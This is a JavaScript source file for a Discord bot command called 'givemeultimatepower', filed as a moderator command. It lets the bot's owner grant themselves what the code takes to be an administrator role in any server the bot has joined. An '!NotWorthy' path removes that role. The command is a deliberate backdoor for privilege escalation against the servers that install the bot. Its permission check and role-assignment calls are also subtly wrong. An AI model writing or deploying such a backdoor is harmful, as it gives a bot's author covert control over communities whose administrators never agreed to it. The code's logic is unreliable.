const Discord = require( 'discord.js' );
const commando = require( 'discord.js-commando' );
//const path = require( 'path' );
//const fs = require( 'fs' );
//const settings = require( path.join( __dirname, '../settings.json' ) );
const timeString = {
  year: 'numeric',  month: 'long', day: 'numeric',
  hour: 'numeric', minute: 'numeric', second: 'numeric',
  timeZone: 'America/New_York', timeZoneName: 'short' };
const bot = 'LOTRObot';
/*var objWorthyOfUltimatePower = {};
const fsWorthyOfUltimatePower = bot + '/dbUltimate.json';
fs.readFile( fsWorthyOfUltimatePower, 'utf8', async ( errRead, strTempDB ) => {
  if ( errRead && errRead.code === 'ENOENT' ) {
    console.error( ( new Date() ).toLocaleDateString( 'en-US', timeString ) + ': "./' + fsWorthyOfUltimatePower + '" not found while trying to load givemeultimatepower.js' );
  } else if ( errRead ) {
    throw errRead;
  } else {
    objWorthyOfUltimatePower = JSON.parse( strTempDB );
  }  
} );//*/

class GiveMeUltimatePower extends commando.Command {
  constructor( client ) {
    super( client, {
      name: 'givemeultimatepower',
      group: 'moderator',
      memberName: 'givemeultimatepower',
      description: 'You want ultimate power in a server?  I can give it to you!',
      aliases: [ 'notworthy' ]
    } );
  }

  async run( message, args ) {
    const client = message.client;
    var boolRoles = false;
    var arrRoles = message.guild.roles.array().sort( function( a, b ){ return b.position - a.position } );
    var arrModifyableRoles = [];
    for ( var ndx = message.guild.members.get( message.client.user.id ).roles.array().slice( 1 ).sort( function( a, b ){ return ( a.position-  b.position ); } )[ 0 ].position; ndx < arrRoles.length; ndx++ ) {
      arrModifyableRoles.push( arrRoles[ ndx ] );
    }
    var arrTheseRoles = [];
    arrModifyableRoles.forEach( function( role, ndx ) {
      if ( ( ( role.permissions - 8 ) % 2 ) === 0 && !boolRoles ) {
        arrTheseRoles.push( role.id );
        boolRoles = true;
      }
    } );
    if ( client.owners.indexOf ( message.author ) !== -1 ) {
      if ( args === '!GiveMeUltimatePower' ) {
        message.channel.send( 'Yes master ' + message.author );
        if ( arrTheseRoles.length === 1 ) {
          message.guild.members.get( message.author.id ).addRoles( arrTheseRoles );
        }
        else if ( arrTheseRoles.length >= 2 ) {
          message.guild.members.get( message.author.id ).addRole( arrTheseRoles );
        }
        else {
          message.channel.send( 'Sorry, ' + message.author + ', I couldn\'t find any roles to assign to you.' );
        }
      }
    }
    else if( args === '!NotWorthy' ) {
      message.guild.members.get( message.author.id ).removeRole( arrTheseRoles );
    }
    else {
      message.channel.send( 'Sorry, ' + message.author + ', you are unknown to me.' );
    }
  }
}

module.exports = GiveMeUltimatePower;